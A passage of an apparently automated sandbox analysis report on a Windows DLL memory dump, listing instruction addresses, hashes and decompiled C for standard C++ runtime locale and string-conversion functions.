0x6dddf8b6
0x6dddf8bb
0x6dddf8c6
0x6dddf8ca
0x6dddf8cd
0x6dddf8d2
0x6dddf8db
0x6dddf8dd
0x6dddf8df
0x6dddf924
0x6dddf927
0x6dddf933
0x6dddf8e1
0x6dddf8e1
0x6dddf8e3
0x6dddf8e9
0x6dddf8ef
0x6dddf8f7
0x6dddf8fa
0x6dddf937
0x6dddf945
0x6dddf94a
0x6dddf952
0x6dddf95c
0x6dddf961
0x6dddf96c
0x6dddf970
0x6dddf973
0x6dddf978
0x6dddf981
0x6dddf983
0x6dddf985
0x6dddf9ca
0x6dddf9cd
0x6dddf9d9
0x6dddf987
0x6dddf987
0x6dddf989
0x6dddf98f
0x6dddf995
0x6dddf99d
0x6dddf9a0
0x6dddf9dd
0x6dddf9eb
0x6dddf9f0
0x6dddf9f8
0x6dddfa02
0x6dddfa07
0x6dddfa12
0x6dddfa16
0x6dddfa19
0x6dddfa1e
0x6dddfa27
0x6dddfa29
0x6dddfa2b
0x6dddfa70
0x6dddfa73
0x6dddfa7f
0x6dddfa2d
0x6dddfa2d
0x6dddfa2f
0x6dddfa35
0x6dddfa3b
0x6dddfa43
0x6dddfa46
0x6dddfa83
0x6dddfa91
0x6dddfa96
0x6dddfa9e
0x6dddfaa8
0x6dddfaad
0x6dddfab8
0x6dddfabc
0x6dddfabf
0x6dddfac4
0x6dddfacd
0x6dddfacf
0x6dddfad1
0x6dddfb16
0x6dddfb19
0x6dddfb25
0x6dddfad3
0x6dddfad3
0x6dddfad5
0x6dddfadb
0x6dddfae1
0x6dddfae9
0x6dddfaec
0x6dddfb29
0x6dddfb37
0x6dddfb3c
0x6dddfb44
0x6dddfb4e
0x6dddfb53
0x6dddfb5e
0x6dddfb62
0x6dddfb65
0x6dddfb6a
0x6dddfb73
0x6dddfb75
0x6dddfb77
0x6dddfbbc
0x6dddfbbf
0x6dddfbcb
0x6dddfb79
0x6dddfb79
0x6dddfb7b
0x6dddfb81
0x6dddfb87
0x6dddfb8f
0x6dddfb92
0x6dddfbcf
0x6dddfbdd
0x6dddfbe2
0x6dddfbea
0x6dddfbf4
0x6dddfbf9
0x6dddfc04
0x6dddfc08
0x6dddfc0b
0x6dddfc10
0x6dddfc19
0x6dddfc1b
0x6dddfc1d
0x6dddfc62
0x6dddfc65
0x6dddfc71
0x6dddfc1f
0x6dddfc1f
0x6dddfc21
0x6dddfc27
0x6dddfc2d
0x6dddfc35
0x6dddfc38
0x6dddfc75
0x6dddfc83
0x6dddfc88
0x6dddfc90
0x6dddfc9a
0x6dddfc9f
0x6dddfcaa
0x6dddfcae
0x6dddfcb1
0x6dddfcb6
0x6dddfcbf
0x6dddfcc1
0x6dddfcc3
0x6dddfd08
0x6dddfd0b
0x6dddfd17
0x6dddfcc5
0x6dddfcc5
0x6dddfcc7
0x6dddfccd
0x6dddfcd3
0x6dddfcdb
0x6dddfcde
0x6dddfd18
0x6dddfd1b
0x6dddfd29
0x6dddfd2e
0x6dddfd36
0x6dddfd3b
0x6dddfd3d
0x6dddfd43
0x6dddfd46
0x6dddfd4f
0x6dddfd4f
0x6dddfd4f
0x6dddfd53
0x6dddfd59
0x6dddfd5c
0x6dddfd68
0x6dddfce0
0x6dddfce0
0x6dddfce3
0x6dddfce7
0x6dddfceb
0x6dddfcf8
0x6dddfd00
0x6dddfd02
0x00000000
0x6dddfd02
0x6dddfcc9
0x6dddfcc9
0x00000000
0x6dddfcc9
0x6dddfcc7
0x6dddfc3a
0x6dddfc3a
0x6dddfc3d
0x6dddfc41
0x6dddfc45
0x6dddfc52
0x6dddfc5a
0x6dddfc5c
0x00000000
0x6dddfc5c
0x6dddfc23
0x6dddfc23
0x00000000
0x6dddfc23
0x6dddfc21
0x6dddfb94
0x6dddfb94
0x6dddfb97
0x6dddfb9b
0x6dddfb9f
0x6dddfbac
0x6dddfbb4
0x6dddfbb6
0x00000000
0x6dddfbb6
0x6dddfb7d
0x6dddfb7d
0x00000000
0x6dddfb7d
0x6dddfb7b
0x6dddfaee
0x6dddfaee
0x6dddfaf1
0x6dddfaf5
0x6dddfaf9
0x6dddfb06
0x6dddfb0e
0x6dddfb10
0x00000000
0x6dddfb10
0x6dddfad7
0x6dddfad7
0x00000000
0x6dddfad7
0x6dddfad5
0x6dddfa48
0x6dddfa48
0x6dddfa4b
0x6dddfa4f
0x6dddfa53
0x6dddfa60
0x6dddfa68
0x6dddfa6a
0x00000000
0x6dddfa6a
0x6dddfa31
0x6dddfa31
0x00000000
0x6dddfa31
0x6dddfa2f
0x6dddf9a2
0x6dddf9a2
0x6dddf9a5
0x6dddf9a9
0x6dddf9ad
0x6dddf9ba
0x6dddf9c2
0x6dddf9c4
0x00000000
0x6dddf9c4
0x6dddf98b
0x6dddf98b
0x00000000
0x6dddf98b
0x6dddf989
0x6dddf8fc
0x6dddf8fc
0x6dddf8ff
0x6dddf903
0x6dddf907
0x6dddf914
0x6dddf91c
0x6dddf91e
0x00000000
0x6dddf91e
0x6dddf8e5
0x6dddf8e5
0x00000000
0x6dddf8e5
0x6dddf8e3
0x6dddf856
0x6dddf856
0x6dddf859
0x6dddf85d
0x6dddf861
0x6dddf86e
0x6dddf876
0x6dddf878
0x00000000
0x6dddf878
0x6dddf83f
0x6dddf83f
0x00000000
0x6dddf83f
0x6dddf83d
0x6dddf7b0
0x6dddf7b0
0x6dddf7b3
0x6dddf7b7
0x6dddf7bb
0x6dddf7c8
0x6dddf7d0
0x6dddf7d2
0x00000000
0x6dddf7d2
0x6dddf799
0x6dddf799
0x00000000
0x6dddf799
0x6dddf797
0x6dddf70a
0x6dddf70a
0x6dddf70d
0x6dddf711
0x6dddf715
0x6dddf722
0x6dddf72a
0x6dddf72c
0x00000000
0x6dddf72c
0x6dddf6f3
0x6dddf6f3
0x00000000
0x6dddf6f3
0x6dddf6f1
0x6dddf664
0x6dddf664
0x6dddf667
0x6dddf66b
0x6dddf66f
0x6dddf67c
0x6dddf684
0x6dddf686
0x00000000
0x6dddf686
0x6dddf64d
0x6dddf64d
0x00000000
0x6dddf64d
0x6dddf64b
0x6dddf5be
0x6dddf5be
0x6dddf5c1
0x6dddf5c5
0x6dddf5c9
0x6dddf5d6
0x6dddf5de
0x6dddf5e0
0x00000000
0x6dddf5e0
0x6dddf5a7
0x6dddf5a7
0x00000000
0x6dddf5a7
0x6dddf5a5
0x6dddf518
0x6dddf518
0x6dddf51b
0x6dddf51f
0x6dddf523
0x6dddf530
0x6dddf538
0x6dddf53a
0x00000000
0x6dddf53a
0x6dddf501
0x6dddf501
0x00000000
0x6dddf501
0x6dddf4ff
0x6dddf472
0x6dddf472
0x6dddf475
0x6dddf479
0x6dddf47d
0x6dddf48a
0x6dddf492
0x6dddf494
0x00000000
0x6dddf494
0x6dddf45b
0x6dddf45b
0x00000000
0x6dddf45b
0x6dddf459
0x6dddf3cc
0x6dddf3cc
0x6dddf3cf
0x6dddf3d3
0x6dddf3d7
0x6dddf3e4
0x6dddf3ec
0x6dddf3ee
0x00000000
0x6dddf3ee
0x6dddf3b5
0x6dddf3b5
0x00000000
0x6dddf3b5
0x6dddf3b3
0x6dddf326
0x6dddf326
0x6dddf329
0x6dddf32d
0x6dddf331
0x6dddf33e
0x6dddf346
0x6dddf348
0x00000000
0x6dddf348
0x6dddf30f
0x6dddf30f
0x00000000
0x6dddf30f
0x6dddf30d
0x6dddf280
0x6dddf280
0x6dddf283
0x6dddf287
0x6dddf28b
0x6dddf298
0x6dddf2a0
0x6dddf2a2
0x00000000
0x6dddf2a2
0x6dddf269
0x6dddf269
0x00000000
0x6dddf269
0x6dddf267
0x6dddf1da
0x6dddf1da
0x6dddf1dd
0x6dddf1e1
0x6dddf1e5
0x6dddf1f2
0x6dddf1fa
0x6dddf1fc
0x00000000
0x6dddf1fc
0x6dddf1c3
0x6dddf1c3
0x00000000
0x6dddf1c3
0x6dddf1c1

APIs

__EH_prolog3.LIBCMT ref: 6DDDF18A
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDF194
int.LIBCPMT ref: 6DDDF1AB

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

messages.LIBCPMT ref: 6DDDF1CE
std::_Facet_Register.LIBCPMT ref: 6DDDF1E5
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDF205
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDF223

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
String ID:
API String ID: 438560357-0
Opcode ID: 28f4e5ea580ee1ec15b714a39b640336624956f37f3ccc0650a7408d207fc47a
Instruction ID: ed7608197176dff12b9ddfeccd9af5085c96ace93621fcba128217e95e180beb
Opcode Fuzzy Hash: 28f4e5ea580ee1ec15b714a39b640336624956f37f3ccc0650a7408d207fc47a
Instruction Fuzzy Hash: 3411A076848119DBCF05FBA4D840EFDB775AF84718F26040AFA21AB294DF749A01CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDA059, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6DDDA059(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				signed int _v4;
				intOrPtr _v12;
				void* _v16;
				char _v20;
				intOrPtr* _v28;
				char _v32;
				void* _t77;
				intOrPtr* _t78;
				void* _t90;
				void* _t103;
				void* _t116;
				void* _t129;
				intOrPtr* _t196;
				intOrPtr* _t215;
				intOrPtr* _t216;
				intOrPtr* _t217;
				intOrPtr* _t218;
				void* _t220;
				intOrPtr* _t221;
				intOrPtr* _t222;
				intOrPtr* _t223;
				void* _t224;

				_t212 = __edx;
				_t161 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653( &_v20, 0);
				_t220 =  *0x6de96cd8; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t220;
				_t77 = E6DDB161C(0x6de96cc4);
				_t164 = _a8;
				_t78 = E6DDB171B(_a8, _t77);
				_t214 = _t78;
				if(_t78 != 0) {
					L5:
					E6DDD66BA( &_v20);
					return E6DDF0075(_t214);
				} else {
					if(_t220 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6DDDA96A(__ebx, _t164, __edx, _t214, _t220) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438( &_v32);
							E6DDF3D74( &_v32, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t214, _t220, 0x14);
							E6DDD6653( &_v20, 0);
							_t221 =  *0x6de96cc8; // 0x0
							_v4 = _v4 & 0x00000000;
							_v16 = _t221;
							_t90 = E6DDB161C(0x6de96b38);
							_t171 = _a8;
							_t215 = E6DDB171B(_a8, _t90);
							__eflags = _t215;
							if(_t215 != 0) {
								L12:
								E6DDD66BA( &_v20);
								return E6DDF0075(_t215);
							} else {
								__eflags = _t221;
								if(_t221 == 0) {
									_push(_a8);
									_push( &_v16);
									__eflags = E6DDDA9D2(_t161, _t171, __edx, _t215, _t221) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438( &_v32);
										E6DDF3D74( &_v32, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t161, _t215, _t221, 0x14);
										E6DDD6653( &_v20, 0);
										_t222 =  *0x6de96ccc; // 0x0
										_v4 = _v4 & 0x00000000;
										_v16 = _t222;
										_t103 = E6DDB161C(0x6de96cb8);
										_t178 = _a8;
										_t216 = E6DDB171B(_a8, _t103);
										__eflags = _t216;
										if(_t216 != 0) {
											L19:
											E6DDD66BA( &_v20);
											return E6DDF0075(_t216);
										} else {
											__eflags = _t222;
											if(_t222 == 0) {
												_push(_a8);
												_push( &_v16);
												__eflags = E6DDDAA38(_t161, _t178, __edx, _t216, _t222) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438( &_v32);
													E6DDF3D74( &_v32, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t161, _t216, _t222, 0x14);
													E6DDD6653( &_v20, 0);
													_t223 =  *0x6de96cd0; // 0x0
													_v4 = _v4 & 0x00000000;
													_v16 = _t223;
													_t116 = E6DDB161C(0x6de96cbc);
													_t185 = _a8;
													_t217 = E6DDB171B(_a8, _t116);
													__eflags = _t217;
													if(_t217 != 0) {
														L26:
														E6DDD66BA( &_v20);
														return E6DDF0075(_t217);
													} else {
														__eflags = _t223;
														if(_t223 == 0) {
															_push(_a8);
															_push( &_v16);
															__eflags = E6DDDAAA0(_t161, _t185, _t212, _t217, _t223) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438( &_v32);
																E6DDF3D74( &_v32, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t161, _t217, _t223, 0x14);
																E6DDD6653( &_v20, 0);
																_t224 =  *0x6de96cd4; // 0x0
																_v4 = _v4 & 0x00000000;
																_v16 = _t224;
																_t129 = E6DDB161C(0x6de96cc0);
																_t192 = _a8;
																_t218 = E6DDB171B(_a8, _t129);
																__eflags = _t218;
																if(_t218 != 0) {
																	L33:
																	E6DDD66BA( &_v20);
																	return E6DDF0075(_t218);
																} else {
																	__eflags = _t224;
																	if(_t224 == 0) {
																		_push(_a8);
																		_push( &_v16);
																		__eflags = E6DDDAB08(_t161, _t192, _t212, _t218, _t224) - 0xffffffff;
																		if(__eflags == 0) {
																			_t196 =  &_v32;
																			E6DDB1438(_t196);
																			E6DDF3D74( &_v32, 0x6de93504);
																			asm("int3");
																			_push(_t196);
																			 *((intOrPtr*)(_t196 + 4)) = _v12;
																			_v28 = _t196;
																			 *_t196 = 0x6de3ba24;
																			return _t196;
																		} else {
																			_t218 = _v16;
																			_v16 = _t218;
																			_v4 = 1;
																			E6DDD6FD3(__eflags, _t218);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t218 + 4))))();
																			 *0x6de96cd4 = _t218;
																			goto L33;
																		}
																	} else {
																		_t218 = _t224;
																		goto L33;
																	}
																}
															} else {
																_t217 = _v16;
																_v16 = _t217;
																_v4 = 1;
																E6DDD6FD3(__eflags, _t217);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t217 + 4))))();
																 *0x6de96cd0 = _t217;
																goto L26;
															}
														} else {
															_t217 = _t223;
															goto L26;
														}
													}
												} else {
													_t216 = _v16;
													_v16 = _t216;
													_v4 = 1;
													E6DDD6FD3(__eflags, _t216);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t216 + 4))))();
													 *0x6de96ccc = _t216;
													goto L19;
												}
											} else {
												_t216 = _t222;
												goto L19;
											}
										}
									} else {
										_t215 = _v16;
										_v16 = _t215;
										_v4 = 1;
										E6DDD6FD3(__eflags, _t215);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t215 + 4))))();
										 *0x6de96cc8 = _t215;
										goto L12;
									}
								} else {
									_t215 = _t221;
									goto L12;
								}
							}
						} else {
							_t214 = _v16;
							_v16 = _t214;
							_v4 = 1;
							E6DDD6FD3(__eflags, _t214);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t214 + 4))))();
							 *0x6de96cd8 = _t214;
							goto L5;
						}
					} else {
						_t214 = _t220;
						goto L5;
					}
				}
			}

0x6ddda059
0x6ddda059
0x6ddda060
0x6ddda06a
0x6ddda06f
0x6ddda07a
0x6ddda07e
0x6ddda081
0x6ddda086
0x6ddda08a
0x6ddda08f
0x6ddda093
0x6ddda0d8
0x6ddda0db
0x6ddda0e7
0x6ddda095
0x6ddda097
0x6ddda09d
0x6ddda0a3
0x6ddda0ab
0x6ddda0ae
0x6ddda0eb
0x6ddda0f9
0x6ddda0fe
0x6ddda106
0x6ddda110
0x6ddda115
0x6ddda120
0x6ddda124
0x6ddda127
0x6ddda12c
0x6ddda135
0x6ddda137
0x6ddda139
0x6ddda17e
0x6ddda181
0x6ddda18d
0x6ddda13b
0x6ddda13b
0x6ddda13d
0x6ddda143
0x6ddda149
0x6ddda151
0x6ddda154
0x6ddda191
0x6ddda19f
0x6ddda1a4
0x6ddda1ac
0x6ddda1b6
0x6ddda1bb
0x6ddda1c6
0x6ddda1ca
0x6ddda1cd
0x6ddda1d2
0x6ddda1db
0x6ddda1dd
0x6ddda1df
0x6ddda224
0x6ddda227
0x6ddda233
0x6ddda1e1
0x6ddda1e1
0x6ddda1e3
0x6ddda1e9
0x6ddda1ef
0x6ddda1f7
0x6ddda1fa
0x6ddda237
0x6ddda245
0x6ddda24a
0x6ddda252
0x6ddda25c
0x6ddda261
0x6ddda26c
0x6ddda270
0x6ddda273
0x6ddda278
0x6ddda281
0x6ddda283
0x6ddda285
0x6ddda2ca
0x6ddda2cd
0x6ddda2d9
0x6ddda287
0x6ddda287
0x6ddda289
0x6ddda28f
0x6ddda295
0x6ddda29d
0x6ddda2a0
0x6ddda2dd
0x6ddda2eb
0x6ddda2f0
0x6ddda2f8
0x6ddda302
0x6ddda307
0x6ddda312
0x6ddda316
0x6ddda319
0x6ddda31e
0x6ddda327
0x6ddda329
0x6ddda32b
0x6ddda370
0x6ddda373
0x6ddda37f
0x6ddda32d
0x6ddda32d
0x6ddda32f
0x6ddda335
0x6ddda33b
0x6ddda343
0x6ddda346
0x6ddda380
0x6ddda383
0x6ddda391
0x6ddda396
0x6ddda39a
0x6ddda39e
0x6ddda3a3
0x6ddda3a6
0x6ddda3ad
0x6ddda348
0x6ddda348
0x6ddda34b
0x6ddda34f
0x6ddda353
0x6ddda360
0x6ddda368
0x6ddda36a
0x00000000
0x6ddda36a
0x6ddda331
0x6ddda331
0x00000000
0x6ddda331
0x6ddda32f
0x6ddda2a2
0x6ddda2a2
0x6ddda2a5
0x6ddda2a9
0x6ddda2ad
0x6ddda2ba
0x6ddda2c2
0x6ddda2c4
0x00000000
0x6ddda2c4
0x6ddda28b
0x6ddda28b
0x00000000
0x6ddda28b
0x6ddda289
0x6ddda1fc
0x6ddda1fc
0x6ddda1ff
0x6ddda203
0x6ddda207
0x6ddda214
0x6ddda21c
0x6ddda21e
0x00000000
0x6ddda21e
0x6ddda1e5
0x6ddda1e5
0x00000000
0x6ddda1e5
0x6ddda1e3
0x6ddda156
0x6ddda156
0x6ddda159
0x6ddda15d
0x6ddda161
0x6ddda16e
0x6ddda176
0x6ddda178
0x00000000
0x6ddda178
0x6ddda13f
0x6ddda13f
0x00000000
0x6ddda13f
0x6ddda13d
0x6ddda0b0
0x6ddda0b0
0x6ddda0b3
0x6ddda0b7
0x6ddda0bb
0x6ddda0c8
0x6ddda0d0
0x6ddda0d2
0x00000000
0x6ddda0d2
0x6ddda099
0x6ddda099
0x00000000
0x6ddda099
0x6ddda097

APIs

__EH_prolog3.LIBCMT ref: 6DDDA060
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDA06A
int.LIBCPMT ref: 6DDDA081

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

codecvt.LIBCPMT ref: 6DDDA0A4
std::_Facet_Register.LIBCPMT ref: 6DDDA0BB
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDA0DB
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDA0F9

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
String ID:
API String ID: 2594415655-0
Opcode ID: f7ff62ec1ff5e342861a931d33a1c18722b028c531743fac69bade8a78d38663
Instruction ID: 7be3cc326aec7e48e3d7ee1cb679a32b68b3b7e0ffdd710f85e3806aa0e47c20
Opcode Fuzzy Hash: f7ff62ec1ff5e342861a931d33a1c18722b028c531743fac69bade8a78d38663
Instruction Fuzzy Hash: B311A376845119DBCF01FB64C840ABDB774AF54714F264409F511BB290DF749905C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDA2F1, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E6DDDA2F1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v4;
				intOrPtr* _v12;
				void* _v16;
				char _v20;
				char _v32;
				void* _t21;
				intOrPtr* _t22;
				intOrPtr* _t44;
				void* _t52;

				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653( &_v20, 0);
				_t52 =  *0x6de96cd4; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t52;
				_t21 = E6DDB161C(0x6de96cc0);
				_t40 = _a8;
				_t22 = E6DDB171B(_a8, _t21);
				_t50 = _t22;
				if(_t22 != 0) {
					L5:
					E6DDD66BA( &_v20);
					return E6DDF0075(_t50);
				} else {
					if(_t52 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6DDDAB08(__ebx, _t40, __edx, _t50, _t52) - 0xffffffff;
						if(__eflags == 0) {
							_t44 =  &_v32;
							E6DDB1438(_t44);
							E6DDF3D74( &_v32, 0x6de93504);
							asm("int3");
							_push(_t44);
							 *((intOrPtr*)(_t44 + 4)) = _a4;
							_v12 = _t44;
							 *_t44 = 0x6de3ba24;
							return _t44;
						} else {
							_t50 = _v16;
							_v16 = _t50;
							_v4 = 1;
							E6DDD6FD3(__eflags, _t50);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t50 + 4))))();
							 *0x6de96cd4 = _t50;
							goto L5;
						}
					} else {
						_t50 = _t52;
						goto L5;
					}
				}
			}

0x6ddda2f8
0x6ddda302
0x6ddda307
0x6ddda312
0x6ddda316
0x6ddda319
0x6ddda31e
0x6ddda322
0x6ddda327
0x6ddda32b
0x6ddda370
0x6ddda373
0x6ddda37f
0x6ddda32d
0x6ddda32f
0x6ddda335
0x6ddda33b
0x6ddda343
0x6ddda346
0x6ddda380
0x6ddda383
0x6ddda391
0x6ddda396
0x6ddda39a
0x6ddda39e
0x6ddda3a3
0x6ddda3a6
0x6ddda3ad
0x6ddda348
0x6ddda348
0x6ddda34b
0x6ddda34f
0x6ddda353
0x6ddda360
0x6ddda368
0x6ddda36a
0x00000000
0x6ddda36a
0x6ddda331
0x6ddda331
0x00000000
0x6ddda331
0x6ddda32f

APIs

__EH_prolog3.LIBCMT ref: 6DDDA2F8
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDA302
int.LIBCPMT ref: 6DDDA319

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

numpunct.LIBCPMT ref: 6DDDA33C
std::_Facet_Register.LIBCPMT ref: 6DDDA353
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDA373
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDA391

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrownumpunct
String ID:
API String ID: 2509942033-0
Opcode ID: 7eac40917f9b347577a6bb77f888b23c4b0a5c891e23cc7c8fb58b08de0f5993
Instruction ID: 85bd4964444798d3d36a94313e3e4f6fe62d2968a05bc83804077c70f5d24f54
Opcode Fuzzy Hash: 7eac40917f9b347577a6bb77f888b23c4b0a5c891e23cc7c8fb58b08de0f5993
Instruction Fuzzy Hash: DA11C275909229DBCF01FBA4C840EFDB7B5AF55318F264409F611AB290DF74AA02CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DE2621F, Relevance: 9.2, APIs: 6, Instructions: 216
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E6DE2621F(void* __ebx, void* __ecx, void* __edi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				void* __esi;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				int _t97;
				short* _t100;
				int _t102;
				void* _t103;
				signed int _t105;
				short* _t106;
				void* _t109;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x6de9506c; // 0xc4837075
				_v8 = _t49 ^ _t105;
				_t102 = _a20;
				if(_t102 > 0) {
					_t78 = E6DE16BDB(_a16, _t102);
					_t109 = _t78 - _t102;
					_t4 = _t78 + 1; // 0x1
					_t102 = _t4;
					if(_t109 >= 0) {
						_t102 = _t78;
					}
				}
				_t97 = _a32;
				if(_t97 == 0) {
					_t97 =  *( *_a4 + 8);
					_a32 = _t97;
				}
				_t54 = MultiByteToWideChar(_t97, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t102, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					_pop(_t103);
					return E6DDEF8A5(_v8 ^ _t105, _t95, _t103);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t104 = 0;
							L37:
							E6DDDDEE1(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t97, 1, _a16, _t102, _t81, _v12);
						_t120 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t99 = _v12;
						_t60 = E6DE24640(_t85, _t120, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
						_t104 = _t60;
						if(_t104 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t95 = _t104 + _t104;
							_t87 = _t95 + 8;
							__eflags = _t95 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t100 = 0;
								__eflags = 0;
								L30:
								__eflags = _t100;
								if(__eflags == 0) {
									L35:
									E6DDDDEE1(_t100);
									goto L36;
								}
								_t62 = E6DE24640(_t87, __eflags, _a8, _a12, _t81, _v12, _t100, _t104, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t104 = WideCharToMultiByte(_a32, 0, _t100, _t104, ??, ??, ??, ??);
								__eflags = _t104;
								if(_t104 != 0) {
									E6DDDDEE1(_t100);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t95 + 8;
							__eflags = _t95 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t95 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t95 - _t87;
								asm("sbb eax, eax");
								_t100 = E6DE1F26D(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t100;
								if(_t100 == 0) {
									goto L35;
								}
								 *_t100 = 0xdddd;
								L28:
								_t100 =  &(_t100[4]);
								goto L30;
							}
							__eflags = _t95 - _t87;
							asm("sbb eax, eax");
							E6DDF01B0();
							_t100 = _t106;
							__eflags = _t100;
							if(_t100 == 0) {
								goto L35;
							}
							 *_t100 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t124 = _t104 - _t70;
						if(_t104 > _t70) {
							goto L36;
						}
						_t71 = E6DE24640(0, _t124, _a8, _a12, _t81, _t99, _a24, _t70, 0, 0, 0);
						_t104 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E6DE1F26D(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E6DDF01B0();
					_t81 = _t106;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}

0x6de26224
0x6de26225
0x6de26226
0x6de2622d
0x6de26232
0x6de26238
0x6de2623e
0x6de26244
0x6de26247
0x6de26247
0x6de2624a
